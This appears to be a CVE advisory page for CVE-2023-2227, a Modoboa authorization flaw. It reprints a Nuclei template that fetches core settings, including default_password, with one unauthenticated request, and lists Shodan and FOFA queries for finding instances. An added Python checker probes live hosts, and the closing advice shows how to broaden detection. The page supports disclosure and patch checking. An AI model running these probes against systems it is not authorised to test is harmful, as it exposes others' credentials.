CVE-2023-2227: Modoboa < 2.1.0 - Improper Authorization

Date: 2025-08-01 | Affected software: Modoboa | PoC: public

Vulnerability description

Improper Authorization in GitHub repository modoboa/modoboa prior to 2.1.0 (NVD description, CWE-285). The published template below exercises the flaw as a single unauthenticated GET to /api/v2/parameters/core/: an affected instance answers 200 with the core settings as JSON, including the default_password and authentication_type parameters, to a caller that presents no session or token. The fix is in commit 7bcd3f6eb264d4e3e01071c97c2bac51cdd6fe97 and shipped in Modoboa 2.1.0.

PoC code [public]

id: CVE-2023-2227

info:
  name: Modoboa < 2.1.0 - Improper Authorization
  author: ritikchaddha,princechaddha
  severity: critical
  description: |
    Improper Authorization in GitHub repository modoboa/modoboa prior to 2.1.0.
  reference:
    - https://huntr.com/bounties/351f9055-2008-4af0-b820-01ff66678bf3
    - https://github.com/modoboa/modoboa/commit/7bcd3f6eb264d4e3e01071c97c2bac51cdd6fe97
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2227
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2023-2227
    cwe-id: CWE-285
    epss-score: 0.90923
    epss-percentile: 0.99619
    cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: modoboa
    product: modoboa
    shodan-query:
      - "http.favicon.hash:1949005079"
      - http.html:"modoboa"
    fofa-query:
      - "body=\"Modoboa\""
      - body="modoboa"
      - icon_hash=1949005079
  tags: cve,cve2023,modoboa,exposure,disclosure

http:
  - raw:
      - |
        GET /api/v2/parameters/core/ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: 7h3h4ckv157

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'label":'
          - 'default_password":'
          - 'authentication_type":"local'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a0046304402200e996e0ae1adc8f681f184ba2c3ab3e5ed2d9e6a554c39b9bcd49c910996196402204504d44d5f6409345d20f5b2486be015823fe53db8f87d251a580f231f5d1bf5:922c64590222798bb761d5b6d8e72950
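The template above encodes its verdict in three Nuclei matchers joined with `matchers-condition: and`: status 200, a header containing application/json, and three substrings in the body. The Python below is an added example, not part of the original page or of the Modoboa project: it re-implements that matcher logic offline against constructed sample responses so the decision can be reasoned about and tested, and adds a one-request live check that mirrors the template's `max-request: 1`. The response bodies, the path constant and the User-Agent are assumptions for illustration; the JSON shapes are constructed and are not captured from a real Modoboa instance. One caveat the code makes visible: the body matcher requires the literal `authentication_type":"local`, so a vulnerable instance configured for a non-local authentication backend still leaks its settings but is not flagged by this template.

```python
"""Offline model of the CVE-2023-2227 Nuclei matchers plus a one-request live check.

Added example, not code from the original page or from Modoboa.
"""
import json
import sys
import urllib.error
import urllib.request
from typing import Mapping

# Endpoint the template probes with no session or token (assumption: same path as the template).
PATH = "/api/v2/parameters/core/"

# The three substrings the template's body matcher requires (condition: and).
REQUIRED_BODY_TOKENS = ('label":', 'default_password":', 'authentication_type":"local')


def matches_cve_2023_2227(status: int, headers: Mapping[str, str], body: str) -> bool:
    """Return True only when all three template matchers would fire.

    status matcher  -> HTTP 200
    header matcher  -> some header value contains application/json
    body matcher    -> every substring in REQUIRED_BODY_TOKENS is present
    """
    if status != 200:
        return False
    if not any("application/json" in value for value in headers.values()):
        return False
    return all(token in body for token in REQUIRED_BODY_TOKENS)


def check_host(base_url: str, timeout: float = 10.0) -> bool:
    """Live check: one unauthenticated GET, same as the template (max-request: 1).

    A patched instance is expected to reject the anonymous caller (401/403);
    urllib surfaces that as HTTPError, which is fed through the same matcher
    and therefore evaluates to 'not matched'.
    """
    req = urllib.request.Request(
        base_url.rstrip("/") + PATH,
        headers={"Accept": "application/json", "User-Agent": "cve-2023-2227-check"},  # UA is an assumption
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", errors="replace")
            return matches_cve_2023_2227(resp.status, dict(resp.headers), body)
    except urllib.error.HTTPError as exc:
        body = exc.read().decode("utf-8", errors="replace")
        return matches_cve_2023_2227(exc.code, dict(exc.headers), body)


# Constructed sample responses (not captured from a real Modoboa instance).
# Compact separators reproduce the no-space JSON the matcher string 'authentication_type":"local' assumes.
VULNERABLE_BODY = json.dumps(
    {"label": "General", "authentication_type": "local", "default_password": "changeme"},
    separators=(",", ":"),
)
# Same leak, but the install uses a non-local backend: the template's body matcher will NOT fire.
NON_LOCAL_AUTH_BODY = json.dumps(
    {"label": "General", "authentication_type": "ldap", "default_password": "changeme"},
    separators=(",", ":"),
)
# Constructed stand-in for what a patched instance returns to an anonymous caller.
PATCHED_BODY = json.dumps({"detail": "Authentication credentials were not provided."})

JSON_HEADERS = {"Content-Type": "application/json"}


if __name__ == "__main__":
    if len(sys.argv) == 2:
        print("matched" if check_host(sys.argv[1]) else "not matched")
    else:
        # Offline demonstration of the matcher on the constructed samples.
        print("vulnerable sample  :", matches_cve_2023_2227(200, JSON_HEADERS, VULNERABLE_BODY))
        print("non-local auth     :", matches_cve_2023_2227(200, JSON_HEADERS, NON_LOCAL_AUTH_BODY))
        print("patched (401)      :", matches_cve_2023_2227(401, JSON_HEADERS, PATCHED_BODY))
```

Run it with a base URL (`python check.py https://mail.example.org`) for the live probe, or with no arguments to see the matcher decisions on the constructed samples. If you are hunting for the exposure rather than the exact template signature, drop the `authentication_type":"local` token and keep the other two; the template as published is tuned for low false positives, not for coverage of every affected configuration.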
